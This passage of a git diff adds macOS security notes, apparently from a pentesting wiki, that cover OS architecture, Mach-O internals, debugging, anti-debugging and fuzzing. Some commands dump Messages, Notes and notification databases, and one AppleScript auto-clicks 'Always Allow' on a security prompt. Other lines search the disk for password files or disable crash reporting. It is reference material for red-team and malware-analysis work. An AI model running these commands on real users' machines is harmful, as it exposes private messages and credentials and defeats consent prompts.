.tables +sqlite3 $HOME/Library/Messages/chat.db 'select * from message' +sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' +sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' +sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets' +``` + +### Notifications + +You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` + +Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable** or use **`strings`**. To access it you can do: + +```bash +cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/ +strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack +``` + +### Notes + +The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite` + +```bash +sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables + +#To dump it in a readable format: +for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done +``` + +## File Extensions Apps + +The following line can be useful to find the applications that can open files depending on the extension: + +```bash +/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E "path:|bindings:|name:" +``` + +Or use something like [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): + +```bash +./swda getSchemes #Get all the available schemes +./swda getApps #Get all the apps declared +./swda getUTIs #Get all the UTIs +./swda getHandler --URL ftp #Get ftp handler +``` + +You can also check the extensions supported by an application doing: + +```bash +cd /Applications/Safari.app/Contents +grep -A3 CFBundleTypeExtensions Info.plist | grep string + css + pdf + webarchive + webbookmark + webhistory + webloc + download + safariextz + gif + html + htm + js + jpg + jpeg + jp2 + txt + text + png + tiff + tif + url + ico + xhtml + xht + xml + xbl + svg +``` + +## Apple Scripts + +It's a scripting language used for task automation **interacting with remote processes**. It makes pretty easy to **ask other processes to perform some actions**. **Malware** may abuse these features to abuse functions exported by other processes. +For example, a malware could **inject arbitrary JS code in browser opened pages**. Or **auto click** some allow permissions requested to the user; + +```bash +tell window 1 of process “SecurityAgent” + click button “Always Allow” of group 1 +end tell +``` + +Here you have some examples: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts) +Find more info about malware using applescripts [**here**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/). + +Apple scripts may be easily "**compiled**". These versions can be easily "**decompiled**" with `osadecompile` + +However, this scripts can also be **exported as "Read only"** \(via the "Export..." option\): + +![](../../.gitbook/assets/image%20%28535%29.png) + +```bash +file mal.scpt +mal.scpt: AppleScript compiled +``` + +and tin this case the content cannot be decompiled even with `osadecompile` + +However, there are still some tools that can be used to understand this kind of executables, [**read this research for more info**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)\). The tool [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) with [**aevt\_decompile**](https://github.com/SentineLabs/aevt_decompile) will be very useful to understand how the script works. + +## MacOS Red Teaming + +Red Teaming in **environments where MacOS** is used instead of Windows can be very **different**. In this guide you will find some interesting tricks for this kind of assessments: + +{% page-ref page="macos-red-teaming.md" %} + +## MacOS Automatic Enumeration Tools + +* **MacPEAS**: [https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) +* **Metasploit**: [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum\_osx.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum_osx.rb) +* **SwiftBelt**: [https://github.com/cedowens/SwiftBelt](https://github.com/cedowens/SwiftBelt) + +## Specific MacOS Commands + +```bash +#System info +date +cal +uptime #show time from starting +w #list users +whoami #this user +finger username #info about user +uname -a #sysinfo +cat /proc/cpuinfo #processor +cat /proc/meminfo #memory +free #check memory +df #check disk + +launchctl list #List services +atq #List "at" tasks for the user +sysctl -a #List kernel configuration +diskutil list #List connected hard drives +nettop #Monitor network usage of processes in top style + +system_profiler SPSoftwareDataType #System info +system_profiler SPPrintersDataType #Printer +system_profiler SPApplicationsDataType #Installed Apps +system_profiler SPFrameworksDataType #Instaled framework +system_profiler SPDeveloperToolsDataType #Developer tools info +system_profiler SPStartupItemDataType #Startup Items +system_profiler SPNetworkDataType #Network Capabilities +system_profiler SPFirewallDataType #Firewall Status +system_profiler SPNetworkLocationDataType #Known Network +system_profiler SPBluetoothDataType #Bluetooth Info +system_profiler SPEthernetDataType #Ethernet Info +system_profiler SPUSBDataType #USB info +system_profiler SPAirPortDataType #Airport Info + + +#Searches +mdfind password #Show all the files that contains the word password +mfind -name password #List all the files containing the word password in the name + + +#Open any app +open -a --hide #Open app hidden +open some.doc -a TextEdit #Open a file in one application + + +#Computer doesn't go to sleep +caffeinate & + + +#Screenshot +## This will ask for permission to the user +screencapture -x /tmp/ss.jpg #Save screenshot in that file + + +#Get clipboard info +pbpaste + + +#system_profiler +system_profiler --help #This command without arguments take lot of memory and time. +system_profiler -listDataTypes +system_profiler SPSoftwareDataType SPNetworkDataType + + +#Network +arp -i en0 -l -a #Print the macOS device's ARP table +lsof -i -P -n | grep LISTEN +smbutil statshares -a #View smb shares mounted to the hard drive + +##networksetup - set or view network options: Proxies, FW options and more +networksetup -listallnetworkservices #List network services +networksetup -listallhardwareports #Hardware ports +networksetup -getinfo Wi-Fi #Wi-Fi info +networksetup -getautoproxyurl Wi-Fi #Get proxy URL for Wifi +networksetup -getwebproxy Wi-Fi #Wifi Web proxy +networksetup -getftpproxy Wi-Fi #Wifi ftp proxy + + +#Brew +brew list #List installed +brew search #Search package +brew info +brew install +brew uninstall +brew cleanup #Remove older versions of installed formulae. +brew cleanup #Remove older versions of specified formula. + + +#Make the machine talk +say hello -v diego +#spanish: diego, Jorge, Monica +#mexican: Juan, Paulina +#french: Thomas, Amelie + +############ High privileges actions +sudo purge #purge RAM +#Sharing preferences +sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist (enable ssh) +sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist (disable ssh) +#Start apache +sudo apachectl (start|status|restart|stop) + ##Web folder: /Library/WebServer/Documents/ +#Remove DNS cache +dscacheutil -flushcache +sudo killall -HUP mDNSResponder + +``` + +## References + +* \*\*\*\*[**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)\*\*\*\* +* \*\*\*\*[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)\*\*\*\* +* \*\*\*\*[**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet)\*\*\*\* +* \*\*\*\*[**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)\*\*\*\* + diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md new file mode 100644 index 00000000000..00aa5ad8624 --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md @@ -0,0 +1,277 @@ +# Mac OS Architecture + +## Kernel + +### XNU + +The heart of Mac OS X is the **XNU kernel**. XNU is basically composed of a **Mach core** \(covered in the next section\) with supplementary features provided by Berkeley Software Distribution \(**BSD**\). Additionally, **XNU** is responsible for providing an **environment for kernel drivers called the I/O Kit**. **XNU is a Darwin package**, so all of the source **code** is **freely available**. + +From a security researcher’s perspective, **Mac OS X feels just like a FreeBSD box with a pretty windowing system** and a large number of custom applications. For the most part, applications written for BSD will compile and run without modification on Mac OS X. All the tools you are accustomed to using in BSD are available in Mac OS X. Nevertheless, the fact that the **XNU kernel contains all the Mach code** means that some day, when you have to dig deeper, you’ll find many differences that may cause you problems and some you may be able to leverage for your own purposes. + +### Mach + +Mach was originated as a UNIX-compatible **operating system** back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks. + +**In XNU, Mach is responsible for many of the low-level operations** you expect from a kernel, such as processor scheduling and multitasking and virtual- memory management. + +### BSD + +The **kernel** also involves a large chunk of **code derived from the FreeBSD** code base. This code runs as part of the kernel along with Mach and uses the same address space. The F**reeBSD code within XNU may differ significantly from the original FreeBSD code**, as changes had to be made for it to coexist with Mach. FreeBSD provides many of the remaining operations the kernel needs, including: + +* Processes +* Signals +* Basic security, such as users and groups +* System call infrastructure +* TCP/IP stack and sockets +* Firewall and packet filtering + +To get an idea of just how complicated the interaction between these two sets of code can be, consider the idea of the fundamental executing unit. **In BSD the fundamental unit is the process. In Mach it is a Mach thread**. The disparity is settled by each BSD-style process being associated with a Mach task consisting of exactly one Mach thread. When the BSD fork\(\) system call is made, the BSD code in the kernel uses Mach calls to create a task and thread structure. Also, it is important to note that both the Mach and BSD layers have different security models. The **Mach security** model is **based** **on** **port** **rights**, and the **BSD** model is based on **process** **ownership**. Disparities between these two models have resulted in a **number of local privilege-escalation vulnerabilities**. Additionally, besides typical system cells, there are Mach traps that allow user-space programs to communicate with the kernel. + +### I/O Kit - Drivers + +I/O Kit is the open-source, object-oriented, **device-driver framework** in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in: + +* `/System/Library/Extensions` + * KEXT files built into the OS X operating system. +* `/Library/Extensions` + * KEXT files installed by 3rd party software + +```bash +#Use kextstat to print the loaded drivers +kextstat +Executing: /usr/bin/kmutil showloaded +No variant specified, falling back to release +Index Refs Address Size Wired Name (Version) UUID + 1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> + 9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> + 10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> +``` + +Until the number 9 the listed drivers are **loaded in the address 0**. This means that those aren't real drivers but **part of the kernel and they cannot be unloaded**. + +In order to find specific extensions you can use: + +```bash +kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id +kextfind -bundle-id -substring IOR #Search by substring in bundle-id +``` + +To load and unload kernel extensions do: + +```bash +kextload com.apple.iokit.IOReportFamily +kextunload com.apple.iokit.IOReportFamily +``` + +## Applications + +A kernel without applications isn’t very useful. **Darwin** is the non-Aqua, **open-source core of Mac OS X**. Basically it is all the parts of Mac OS X for which the **source code is available**. The code is made available in the form of a **package that is easy to install**. There are hundreds of **available Darwin packages**, such as X11, GCC, and other GNU tools. Darwin provides many of the applications you may already use in BSD or Linux for Mac OS X. Apple has spent significant time **integrating these packages into their operating system** so that everything behaves nicely and has a consistent look and feel when possible. + +On the **other** hand, many familiar pieces of Mac OS X are **not open source**. The main missing piece to someone running just the Darwin code will be **Aqua**, the **Mac OS X windowing and graphical-interface environment**. Additionally, most of the common **high-level applications**, such as Safari, Mail, QuickTime, iChat, etc., are not open source \(although some of their components are open source\). Interestingly, these closed-source applications often **rely on open- source software**, for example, Safari relies on the WebKit project for HTML and JavaScript rendering. **For perhaps this reason, you also typically have many more symbols in these applications when debugging than you would in a Windows environment.** + +### **Universal binaries** + +Mac OS binaries usually are compiled as universal binaries. ****A **universal binary** can **support multiple architectures in the same file**. + +```bash +file /bin/ls +/bin/ls: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64e:Mach-O 64-bit executable arm64e] +/bin/ls (for architecture x86_64): Mach-O 64-bit executable x86_64 +/bin/ls (for architecture arm64e): Mach-O 64-bit executable arm64e +``` + +In the following example, a universal binary for the **x86** **and** **PowerPC** architectures is created: + +```bash +gcc -arch ppc -arch i386 -o test-universal test.c +``` + +As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch. + +### Mach-o Format + +![](../../.gitbook/assets/image%20%28557%29.png) + +#### **Header** + +The header contains basic information about the file, such as magic bytes to identify it as a Mach-O file and information about the target architecture. You can find it in: `mdfind loader.h | grep -i mach-o | grep -E "loader.h$"` + +```c +struct mach_header { + uint32_t magic; /* mach magic number identifier */ + cpu_type_t cputype; /* cpu specifier (e.g. I386) */ + cpu_subtype_t cpusubtype; /* machine specifier */ + uint32_t filetype; /* type of file (usage and alignment for the file) */ + uint32_t ncmds; /* number of load commands */ + uint32_t sizeofcmds; /* the size of all the load commands */ + uint32_t flags; /* flags */ +}; +``` + +Filetypes: + +* MH\_EXECUTE \(0x2\): Standard Mach-O executable +* MH\_DYLIB \(0x6\): A Mach-O dynamic linked library \(i.e. .dylib\) +* MH\_BUNDLE \(0x8\): A Mach-O bundle \(i.e. .bundle\) + +#### \*\*\*\* + +#### **Load commands** + +This specifies the **layout of the file in memory**. It contains the **location of the symbol table**, the main thread context at the beginning of execution, and which **shared libraries** are required. +The commands basically instruct the dynamic loader **\(dyld\) how to load the binary in memory.** + +Load commands all begin with a **load\_command** structure, defined in mach-o/loader.h: + +```objectivec +struct load_command { + uint32_t cmd; /* type of load command */ + uint32_t cmdsize; /* total size of command in bytes */ +}; +``` + +A **common** type of load command is **LC\_SEGMENT/LC\_SEGMENT\_64**, which **describes** a **segment:** +_A segment defines a **range of bytes** in a Mach-O file and the **addresses** and **memory** **protection** **attributes** at which those bytes are **mapped into** virtual memory when the dynamic linker loads the application._ + +![](../../.gitbook/assets/image%20%28554%29.png) + +Common segments: + +* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment: + * `__text`: ****Compiled binary code + * `__const`: Constant data + * `__cstring`: String constants +* **`__DATA`**: Contains data that is **writable.** + * `__data`: Global variables \(that have been initialized\) + * `__bss`: Static variables \(that have not been initialized\) + * `__objc_*` \(\_\_objc\_classlist, \_\_objc\_protolist, etc\): Information used by the Objective-C runtime +* **`__LINKEDIT`**: Contains information for the linker \(dyld\) such as, "symbol, string, and relocation table entries." +* **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections. +* **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the \(in-memory\) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code. +* **`LC_LOAD_DYLIB`**: ****This load command describes a **dynamic** **library** dependency which **instructs** the **loader** \(dyld\) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires. + + * This load command is a structure of type **`dylib_command`** \(which contains a struct dylib, describing the actual dependent dynamic library\): + + ```objectivec + struct dylib_command { + uint32_t cmd; /* LC_LOAD_{,WEAK_}DYLIB */ + uint32_t cmdsize; /* includes pathname string */ + struct dylib dylib; /* the library identification */ + }; + + struct dylib { + union lc_str name; /* library's path name */ + uint32_t timestamp; /* library's build time stamp */ + uint32_t current_version; /* library's current version number */ + uint32_t compatibility_version; /* library's compatibility vers number*/ + }; + ``` + +![](../../.gitbook/assets/image%20%28558%29.png) + +Some potential malware related libraries are: + +* **DiskArbitration**: Monitoring USB drives +* **AVFoundation:** Capture audio and video +* **CoreWLAN**: Wifi scans. + +{% hint style="info" %} +A Mach-O binary can contain one or **more** **constructors**, that will be **executed** **before** the address specified in **LC\_MAIN**. +The offsets of any constructors are held in the **\_\_mod\_init\_func** section of the **\_\_DATA\_CONST** segment. +{% endhint %} + +#### \*\*\*\* + +#### **Data** + +The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type. + +![](../../.gitbook/assets/image%20%28507%29.png) + +#### Get the info + +```bash +otool -f /bin/ls #Get universal headers info +otool -hv /bin/ls #Get the Mach header +otool -l /bin/ls #Get Load commands +otool -L /bin/ls #Get libraries used by the binary +``` + +Or you can use the GUI tool [**machoview**](https://sourceforge.net/projects/machoview/). + +### Bundles + +Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder**. The types of resources contained within a bundle may consist of applications, libraries, images, documentation, header files, etc. All these files are inside `.app/Contents/` + +```bash +ls -lR /Applications/Safari.app/Contents +``` + +* `Contents/_CodeSignature` + + Contains **code-signing information** about the application \(i.e., hashes, etc.\). + +* `Contents/MacOS` + + Contains the **application’s binary** \(which is executed when the user double-clicks the application icon in the UI\). + +* `Contents/Resources` + + Contains **UI elements of the application**, such as images, documents, and nib/xib files \(that describe various user interfaces\). + +* `Contents/Info.plist` ****The application’s main “**configuration file.**” Apple notes that “the system relies on the presence of this file to identify relevant information about \[the\] application and any related files”. + * **Plist** **files** contains configuration information. You can find find information about the meaning of they plist keys in [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) + * Pairs that may be of interest when analyzing an application include: + + + * **CFBundleExecutable** + + Contains the **name of the application’s binary** \(found in Contents/MacOS\). + + * **CFBundleIdentifier** + + Contains the application’s bundle identifier \(often used by the system to **globally** **identify** the application\). + + * **LSMinimumSystemVersion** + + Contains the **oldest** **version** of **macOS** that the application is compatible with. + +### Objective-C + +Programs written in Objective-C **retain** their class declarations **when** **compiled** into \(Mach-O\) binaries. Such class declarations **include** the name and type of: + +* The class +* The class methods +* The class instance variables + +You can get this information using [**class-dump**](https://github.com/nygard/class-dump): + +```bash +class-dump Kindle.app +``` + +Note that this names can be obfuscated to make the reversing of the binary more difficult. + +### Native Packages + +There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are: + +* **Platypus**: Generate MacOS binary executing ****shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter. + * **It saves the script in `Contents/Resources/script`. So finding this script is a good indicator that Platypus was used.** +* **PyInstaller:** Python + * Ways to detect this is the use of the embedded ****string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.** +* **Electron:** JavaScript, HTML, and CSS. + * These binaries will use **Electron Framework.framework**. Moreover, the non-binary components \(e.g. JavaScript files\) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components \(e.g. JavaScript files\) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked` + +## References + +* \*\*\*\*[**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=)\*\*\*\* +* \*\*\*\*[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)\*\*\*\* + diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md new file mode 100644 index 00000000000..97591c11514 --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md @@ -0,0 +1,392 @@ +# MacOS Apps - Inspecting, debugging and Fuzzing + +## Static Analysis + +### otool + +```bash +otool -L /bin/ls #List dynamically linked libraries +otool -tv /bin/ps #Decompile application +``` + +### SuspiciousPackage + +\*\*\*\*[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files \(installers\) and see what is inside before installing it. +These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**. + +### hdiutil + +This tool allows to **mount** Apple disk images \(**.dmg**\) files to inspect them before running anything: + +```bash +hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg +``` + +It will be mounted in `/Volumes` + +### Objective-C + +When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function: + +![](../../.gitbook/assets/image%20%28559%29.png) + +The params this function expects are: + +* The first parameter \(**self**\) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object \(as a whole\), whereas for an instance method, self will point to an instantiated instance of the class as an object. +* The second parameter, \(**op**\), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** +* The remaining parameters are any **values that are required by the method** \(op\). + +| **Argument** | **Register** | **\(for\) objc\_msgSend** | +| :--- | :--- | :--- | +| **1st argument** | **rdi** | **self: object that the method is being invoked upon** | +| **2nd argument** | **rsi** | **op: name of the method** | +| **3rd argument** | **rdx** | **1st argument to the method** | +| **4th argument** | **rcx** | **2nd argument to the method** | +| **5th argument** | **r8** | **3rd argument to the method** | +| **6th argument** | **r9** | **4th argument to the method** | +| **7th+ argument** | **rsp+ \(on the stack\)** | **5th+ argument to the method** | + +### Packed binaries + +* Check for high entropy +* Check the strings \(is there is almost no understandable string, packed\) +* The UPX packer for MacOS generates a section called "\_\_XHDR" + +## Dynamic Analysis + +{% hint style="warning" %} +Note that in order to debug binaries, **SIP needs to be disabled** \(`csrutil disable` or `csrutil enable --without debug`\) or to copy the binaries to a temporary folder and **remove the signature** with `codesign --remove-signature ` or allow the debugging of the binary \(you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)\) +{% endhint %} + +{% hint style="warning" %} +Note that in order to **instrument system binarie**s, \(such as `cloudconfigurationd`\) on macOS, **SIP must be disabled** \(just removing the signature won't work\). +{% endhint %} + +### dtruss + +```bash +dtruss -c ls #Get syscalls of ls +dtruss -c -p 1000 #get syscalls of PID 1000 +``` + +### ktrace + +You can use this one even with **SIP activated** + +```bash +ktrace trace -s -S -t c -c ls | grep "ls(" +``` + +### dtrace + +It allows users access to applications at an extremely **low level** and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls. + +The available probes of dtrace can be obtained with: + +```bash +dtrace -l | head + ID PROVIDER MODULE FUNCTION NAME + 1 dtrace BEGIN + 2 dtrace END + 3 dtrace ERROR + 43 profile profile-97 + 44 profile profile-199 +``` + +The probe name consists of four parts: the provider, module, function, and name \(`fbt:mach_kernel:ptrace:entry`\). If you not specifies some part of the name, Dtrace will apply that part as a wildcard. + +A more detailed explanation and more examples can be found in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) + +#### Examples + +* In line + +```bash +#Count the number of syscalls of each running process +sudo dtrace -n 'syscall:::entry {@[execname] = count()}' +``` + +* script + +```bash +syscall:::entry +/pid == $1/ +{ +} + +#Log every syscall of a PID +sudo dtrace -s script.d 1234 +``` + +```bash +syscall::open:entry +{ + printf("%s(%s)", probefunc, copyinstr(arg0)); +} +syscall::close:entry +{ + printf("%s(%d)\n", probefunc, arg0); +} + +#Log files opened and closed by a process +sudo dtrace -s b.d -c "cat /etc/hosts" +``` + +```bash +syscall:::entry +{ + ; +} +syscall:::return +{ + printf("=%d\n", arg1); +} + +#Log sys calls with values +sudo dtrace -s syscalls_info.d -c "cat /etc/hosts" +``` + +### ProcessMonitor + +\*\*\*\*[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing \(for example, monitor which new processes a process is creating\). + +### FileMonitor + +\*\*\*\*[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events \(such as creation, modifications, and deletions\) providing detailed information about such events. + +### fs\_usage + +Allows to follow actions performed by processes: + +```bash +fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls +fs_usage -w -f network curl #This tracks network actions +``` + +### TaskExplorer + +\*\*\*\*[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections. +It also checks the binary processes against **virustotal** and show information about the binary. + +### lldb + +**lldb** is the de **facto tool** for **macOS** binary **debugging**. + +```bash +lldb ./malware.bin +lldb -p 1122 +lldb -n malware.bin +lldb -n malware.bin --waitfor +``` + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
(lldb) Command + Description +
run (r) + Starting execution, which will continue unabated until a breakpoint is + hit or the process terminates.
continue (c) + Continue execution of the debugged process.
nexti (n) + Execute the next instruction. This command will skip over function calls.
stepi (s) + Execute the next instruction. Unlike the nexti command, this command will + step into function calls.
finish (f) + Execute the rest of the instructions in the current function (“frame”) + return and halt.
control + c + Pause execution. If the process has been run (r) or continued (c), this + will cause the process to halt ...wherever it is currently executing.
breakpoint (b) + +

b main

+

b -[NSDictionary objectForKey:]

+

b 0x0000000100004bd9

+

br l #Breakpoint list

+

br e/dis <num> #Enable/Disable breakpoint

+

breakpoint delete <num>

+
help + +

help breakpoint #Get help of breakpoint command

+

help memory write #Get help to write into the memory

+
reg + +

reg read $rax

+

reg write $rip 0x100035cc0

+
x/s <reg/memory address> + Display the memory as a null-terminated string.
x/i <reg/memory address> + Display the memory as assembly instruction.
x/b <reg/memory address> + Display the memory as byte.
print object (po) + +

This will print the object referenced by the param

+

po $raw

+

{ +

+

dnsChanger = { +

+

"affiliate" = ""; +

+

"blacklist_dns" = (); +

+

Note that most of Apple’s Objective-C APIs or methods return objects, + and thus should be displayed via the “print object” (po) + command. If po doesn't produce a meaningful output use x/b +
+

+
memory write + memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address
+ +{% hint style="info" %} +When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated \(“C”\) string. To print the name via lldb do: + +`(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"` + +`(lldb) print (char*)$rsi: +(char *) $1 = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"` + +`(lldb) reg read $rsi: rsi = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"` +{% endhint %} + +### Anti-Dynamic Analysis + +#### VM detection + +* The command **`sysctl hw.model`** returns "Mac" when the **host is a MacOS** but something different when it's a VM. +* Playing with the values of **`hw.logicalcpu`** and **`hw.physicalcpu`** some malwares try to detect if it's a VM. +* Some malwares can also **detect** if the machine is **VMware** based on the MAC address \(00:50:56\). +* It's also possible to find **if a process is being debugged** with a simple code such us: + * `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //process being debugged }` +* It can also invoke the **`ptrace`** system call with the **`PT_DENY_ATTACH`** flag. This **prevents** a deb**u**gger from attaching and tracing. + * You can check if the **`sysctl`** or**`ptrace`** function is being **imported** \(but the malware could import it dynamically\) + * As noted in this writeup, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” : “_The message Process \# exited with **status = 45 \(0x0000002d\)** is usually a tell-tale sign that the debug target is using **PT\_DENY\_ATTACH**_” + +## Fuzzing + +### [ReportCrash](https://ss64.com/osx/reportcrash.html#:~:text=ReportCrash%20analyzes%20crashing%20processes%20and%20saves%20a%20crash%20report%20to%20disk.&text=ReportCrash%20also%20records%20the%20identity,when%20a%20crash%20is%20detected.) + +ReportCrash **analyzes crashing processes and saves a crash report to disk**. A crash report contains information that can **help a developer diagnose** the cause of a crash. +For applications and other processes **running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/` +For daemons, other processes **running in the system launchd context** and other privileged processes, ReportCrash runs as a LaunchDaemon and saves crash reports in the system's `/Library/Logs/DiagnosticReports` + +If you are worried about crash reports **being sent to Apple** you can disable them. If not, crash reports can be useful to **figure out how a server crashed**. + +```bash +#To disable crash reporting: +launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist +sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist + +#To re-enable crash reporting: +launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist +sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist +``` + +### Sleep + +While fuzzing in a MacOS it's important to not allow the Mac to sleep: + +* systemsetup -setsleep Never +* pmset, System Preferences +* [KeepingYouAwake](https://github.com/newmarcel/KeepingYouAwake) + +#### SSH Disconnect + +If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd\_config file with: + +* TCPKeepAlive Yes +* ClientAliveInterval 0 